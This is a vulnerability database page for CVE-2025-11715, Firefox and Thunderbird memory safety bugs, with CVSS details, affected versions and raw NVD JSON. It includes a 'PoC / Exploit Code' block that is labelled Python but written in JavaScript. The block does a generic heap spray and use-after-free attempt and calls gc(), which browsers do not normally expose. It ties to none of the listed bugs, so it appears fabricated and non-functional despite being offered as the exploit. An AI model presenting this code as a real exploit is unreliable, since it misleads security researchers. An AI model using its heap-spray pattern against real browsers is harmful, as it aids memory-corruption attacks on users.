Security Vulnerability Report
中文
CVE-2025-11715 CVSS 8.8 HIGH

CVE-2025-11715

Published: 2025-10-14 13:15:38
Last Modified: 2026-04-13 15:16:41
Source: [email protected]

Description

Memory safety bugs present in Firefox ESR 140.3, Thunderbird ESR 140.3, Firefox 143 and Thunderbird 143. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 144
Mozilla Firefox ESR < 140.4
Mozilla Thunderbird < 144
Mozilla Thunderbird ESR < 140.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11715 PoC - Memory Corruption in Firefox ESR 140.3 / Firefox 143 # This is a conceptual PoC demonstrating memory corruption triggers # Note: Actual exploitation requires specific JavaScript engine manipulation // PoC for triggering memory safety bugs in Firefox 143 / ESR 140.3 // Target: JavaScript Engine (SpiderMonkey) memory management (function() { // Step 1: Trigger type confusion via ArrayBuffer manipulation let buf = new ArrayBuffer(0x100); let view = new DataView(buf); // Step 2: Create objects for heap spray let spray = []; for (let i = 0; i < 0x1000; i++) { spray.push(new Uint32Array(0x10)); } // Step 3: Trigger garbage collection to rearrange memory // and exploit use-after-free or type confusion for (let i = 0; i < 100; i++) { let obj = {a: new ArrayBuffer(0x100), b: spray[i % spray.length]}; obj = null; // Trigger GC } // Step 4: Attempt to access freed memory // This may cause memory corruption leading to RCE try { view.setUint32(0, 0x41414141, true); view.setUint32(4, 0x42424242, true); // Trigger vulnerability via crafted JavaScript eval("\n let a = [];\n for (let i = 0; i < 100000; i++) {\n a.push({x: i, y: new Array(100)});\n }\n a.length = 0;\n // Force GC\n gc();\n // Access potentially freed memory\n for (let i = 0; i < a.length; i++) {\n a[i].x = 0xdeadbeef;\n }\n "); } catch(e) { // Memory corruption may cause crash or code execution } })();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11715", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.800", "lastModified": "2026-04-13T15:16:40.547", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory safety bugs present in Firefox ESR 140.3, Thunderbird ESR 140.3, Firefox 143 and Thunderbird 143. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "563626A1-A62C-4F33-A40F-31AC364254E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "099547E7-6CC3-428E-A9DE-1B93C01FFD1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "8B3D3A3B-0A13-4C09-BE2C-A6E6BF290B6F"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/buglist.cgi?bug_id=1983838%2C1987624%2C1988244%2C1988912%2C1989734%2C1990085%2C1991899", "source": "[email protected]", "tags": ["Broken Link", "Issue Tracking"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.